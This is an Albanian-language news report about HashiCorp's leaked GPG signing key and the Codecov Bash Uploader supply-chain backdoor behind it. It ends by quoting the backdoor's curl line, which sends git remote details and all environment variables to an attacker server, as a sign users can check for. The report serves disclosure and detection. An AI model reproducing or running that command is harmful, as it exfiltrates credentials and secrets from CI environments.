HashiCorp, i njohur për zhvillimin e mjeteve me burim të hapur Vagrant, Packer, Nomad dhe Terraform, njoftoi rrjedhjen e çelësit privat GPG të përdorur për të krijuar nënshkrime dixhitale që verifikojnë lëshimet. Sulmuesit që fituan akses në çelësin GPG mund të bëjnë ndryshime të fshehura në produktet HashiCorp duke i verifikuar ato me një nënshkrim të saktë dixhital. Në të njëjtën kohë, kompania deklaroi se gjatë auditimit nuk u identifikuan asnjë gjurmë tentative për të bërë modifikime të tilla.
Aktualisht, çelësi i komprometuar GPG është revokuar dhe në vend të tij është futur një çelës i ri. Problemi preku vetëm verifikimin duke përdorur skedarët SHA256SUM dhe SHA256SUM.sig dhe nuk ndikoi në gjenerimin e nënshkrimeve dixhitale për paketat Linux DEB dhe RPM të ofruara përmes releases.hashicorp.com, si dhe mekanizmat e verifikimit të lëshimit për macOS dhe Windows (AuthentiCode) .
Rrjedhja ndodhi për shkak të përdorimit të skriptit Codecov Bash Uploader (codecov-bash) në infrastrukturë, i krijuar për të shkarkuar raportet e mbulimit nga sistemet e integrimit të vazhdueshëm. Gjatë sulmit ndaj kompanisë Codecov, një derë e pasme u fsheh në skriptin e specifikuar, përmes të cilit fjalëkalimet dhe çelësat e enkriptimit u dërguan në serverin e sulmuesve.
Për të hakuar, sulmuesit përfituan nga një gabim në procesin e krijimit të imazhit të Codecov Docker, i cili i lejoi ata të nxirrnin të dhënat e aksesit në GCS (Google Cloud Storage), të nevojshme për të bërë ndryshime në skriptin Bash Uploader të shpërndarë nga codecov.io faqe interneti. Ndryshimet u bënë më 31 janar, mbetën të pazbuluar për dy muaj dhe lejuan sulmuesit të nxjerrin informacionin e ruajtur në mjediset e sistemit të integrimit të vazhdueshëm të klientit. Duke përdorur kodin e shtuar me qëllim të keq, sulmuesit mund të merrnin informacion në lidhje me depon e testuar të Git dhe të gjitha variablat e mjedisit, duke përfshirë argumentet, çelësat e enkriptimit dhe fjalëkalimet e transmetuara në sistemet e integrimit të vazhdueshëm për të organizuar aksesin në kodin e aplikacionit, depo dhe shërbime si Amazon Web Services dhe GitHub.
Përveç thirrjes direkte, skripti Codecov Bash Uploader u përdor si pjesë e ngarkuesve të tjerë, si Codecov-action (Github), Codecov-circleci-orb dhe Codecov-bitrise-step, përdoruesit e të cilëve gjithashtu preken nga problemi. Të gjithë përdoruesit e codecov-bash dhe produkteve të ngjashme rekomandohen të auditojnë infrastrukturat e tyre, si dhe të ndryshojnë fjalëkalimet dhe çelësat e enkriptimit. Ju mund të kontrolloni praninë e një dere të pasme në një skript nga prania e linjës curl -sm 0.5 -d "$(git remote -v)<<<<<<< ENV $(env)" http:// /ngarkoj/v2 || e vërtetë
Burimi: opennet.ru